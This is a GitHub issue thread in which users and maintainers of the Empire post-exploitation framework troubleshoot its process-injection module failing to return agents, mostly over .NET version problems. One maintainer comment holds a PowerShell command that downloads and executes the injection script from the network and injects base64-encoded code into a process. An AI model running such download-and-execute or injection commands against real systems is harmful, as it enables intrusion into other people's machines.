### ISSUE TITLE
PSinject doesn't send agent back.

### ISSUE THREAD

**Issue by DIRTYPIRATE** [adaptivethreat/Empire#315] opened 2016-09-15 01:27 UTC
## Empire Version
1.5

## OS Information (Linux flavor, Python version)
Parrot 3.1

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
I try to use the psinject function, it starts the debug job, but then doesn't return any agent. I tried user processes and system processes.

## Any additional information
I looked up the previous issue involving this, and it seems to be a different problem.
Victim Os is windows 10 latest build. There are no other issues other than the psinject no sending an agent back.

**Comment by enigma0x3** [comment] 2016-09-15 14:53
What processes are you injecting into?

**Comment by DIRTYPIRATE** [comment] 2016-09-15 19:12
Some example of the top of my head are svchost, skype, explorer.exe, lsass.exe, smss.exe and csrss.exe.
I also tried both x64 and x86 programs and they all don't return an agent of any kind, but everything else works fine except for the bypassuac, which opens up an sql configuration on the victim pc. I assume that is due to settings on the victim.

**Comment by leechristensen** [comment] 2016-09-15 20:24
Is .NET v2 installed on the machine? Or only v4?

**Comment by DIRTYPIRATE** [comment] 2016-09-16 02:24
On the victim or attacker machine? And how would I check? I can't seem to find it in programs.

**Comment by leechristensen** [comment] 2016-09-16 13:39
On the victim machine.  Try running the PowerShell listed here on the victim machine:

http://stackoverflow.com/a/3495491/2022780

Alternative, in Windows, go to "Turn Windows Features On or Off" and see if .NET 3.5 is installed (it installs v2 automatically).  The only reason I ask this is because there's a bug sometimes in PSInject/UnmanagedPowerShell where it tries to load the wrong version of the .NET framework.  We will be releasing an update next week at DerbyCon that should have a fix.

**Comment by DIRTYPIRATE** [comment] 2016-09-16 20:22
![screenshot 2](https://cloud.githubusercontent.com/assets/22207466/18600085/a3ae5d04-7c29-11e6-89ea-c104fc7bb2f1.png)

That is what showed on the victim machine.

**Comment by atkinsj** [comment] 2016-09-21 06:59
@leechristensen I see both OP's behaviour and the one you describe in separate instances. On a 2K8R2 host, attempting to run the standard powershell -enc stager fails with a .NET 3.5 error and I have to manually enable the feature (obviously not a workable solution).

However even after I do so and get an agent successfully running, psinject never returns a new agent and does not return any logging or messaging back to me. Do you have any suggestions for troubleshooting this?

**Comment by leechristensen** [comment] 2016-09-21 10:50
We'll be releasing a new version of Empire in a few days and PSInject has
been updated in it.  It should (hopefully) address the issues identified in
this bug.

**Comment by HarmJ0y** [comment] 2016-09-24 13:30
@DIRTYPIRATE - can you try the psinject version in the 2.0_beta branch (https://github.com/adaptivethreat/Empire/tree/2.0_beta) that was released yesterday?

**Comment by atkinsj** [comment] 2016-09-24 13:51
It's working for me on Server 2012 R2, Windows 8.1 and Server 2008 R2. FWIW, I had to reboot after installing .NET 3.5 on Server 2008 R2 to get it to call back (install -> powershell launcher worked but install -> reboot was required before psinject worked).

Is the default .NET2.0 on Server 2008 R2 unsupported (i.e., .NET 3.5 is the minimum supported version) or do I have something funky going on?

**Comment by leechristensen** [comment] 2016-09-24 15:22
With the new version of Empire(released yesterday), .NET 2 should work.
Can you confirm if it does/doesn't?

**Comment by atkinsj** [comment] 2016-09-24 15:28
@leechristensen still no luck on a vanilla server 2008 r2 install here, which only has .NET 2.0. Previously I could remove the window hidden param and see a .NET 3.5 error but now I get no output.

Installing .NET 3.5 causes it to start working, though. This is using the multi/launcher stager with the powershell launcher.

**Comment by leechristensen** [comment] 2016-09-24 17:15
Dang... :) Thanks for testing.  I'll take a look at it here soon
post-DerbyCon and push a fix.

**Comment by wintermute4316** [comment] 2016-09-27 23:47
fyi Lee, I reported a similar [and as of yet unresolved - ;-) ] issue with psinject last year here: https://github.com/adaptivethreat/Empire/issues/68

If I psinject into another process running as the same user as my current process it works fine, but if I psinject into a SYSTEM process coming from a user process that has a High Integrity Token with full local Administrators privileges, it fails silently and I never get an agent call back from the psinject.  Target system is a domain joined Windows 7 Enterprise x64 and I've even tried this with a Domain Admin account in the lab.

**Comment by DIRTYPIRATE** [comment] 2016-09-28 20:16
Hey, quick issue, not sure if its me being dumb; I started my computer, launched empire to see if the new patch fixed the issue here, and I get an error on any open port when I run a listener.

"Error starting listener in port 8080: [Errno 90] Cannot assaign requested address"

I just wanted to confirm that the port is not used, and the host is my public ip address, and the port is forwarded.

**Comment by DIRTYPIRATE** [comment] 2016-09-28 21:39
the beta_2,0 release doesn't fix the problem... Is there no hope D:

**Comment by leechristensen** [comment] 2016-09-30 18:57
@atkinsj Could you try running the following code on your 2008 R2 instance? 
```

Start-Process notepad
iex ((new-object net.webclient).DownloadString('https://raw.githubusercontent.com/adaptivethreat/Empire/2.0_beta/data/module_source/management/Invoke-PSInject.ps1'))
Invoke-PSInject -ProcName notepad -PoshCode 'WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACIAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzACIAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBNAGUAcwBzAGEAZwBlAEIAbwB4AF0AOgA6AFMAaABvAHcAKAAiAFAAbwBwACAAcABvAHAAIQAiACkAOwA='

```
On my fresh 2008 R2 instance PSInject works just fine, so I I'm trying to isolate if the issue is in the PSInject code or somewhere further up the chain.

**Comment by leechristensen** [comment] 2016-09-30 19:09
@DIRTYPIRATE are you still having issues on Windows 10 when you use the 2.0 branch(https://github.com/adaptivethreat/Empire/tree/2.0_beta)? It's worked for me in all my tests.

**Comment by atkinsj** [comment] 2016-10-01 02:05
@leechristensen so PSInject in Empire 2.0 beta works fine for me **if** .NET 3.5 is installed -- Empire itself only works if .NET 3.5 installed. Did you want me to try PSInject with the default .NET 2.0? I'm happy to of course but the bigger issue is that Empire itself doesn't work under that version.

**Comment by leechristensen** [comment] 2016-10-01 02:42
@atkinsj To start, could you test if PSInject (the snippet I posted) works when only .NET 2.0 is installed?

**Comment by atkinsj** [comment] 2016-10-01 03:51
@leechristensen Your code snippet produces the expected results on my fully updated 2K8R2 host with both .NET 2.0 and .NET 3.5 (rebooted in between enabling the feature).

**Comment by DIRTYPIRATE** [comment] 2016-10-01 17:39
I would like to say that updating to empire Beta 2.0 has fixed this issue.

**Comment by rvrsh3ll** [comment] 2016-10-01 19:34
Thank you for the info. Closing this issue!

**Closed by rvrsh3ll** 2016-10-01 19:34 UTC
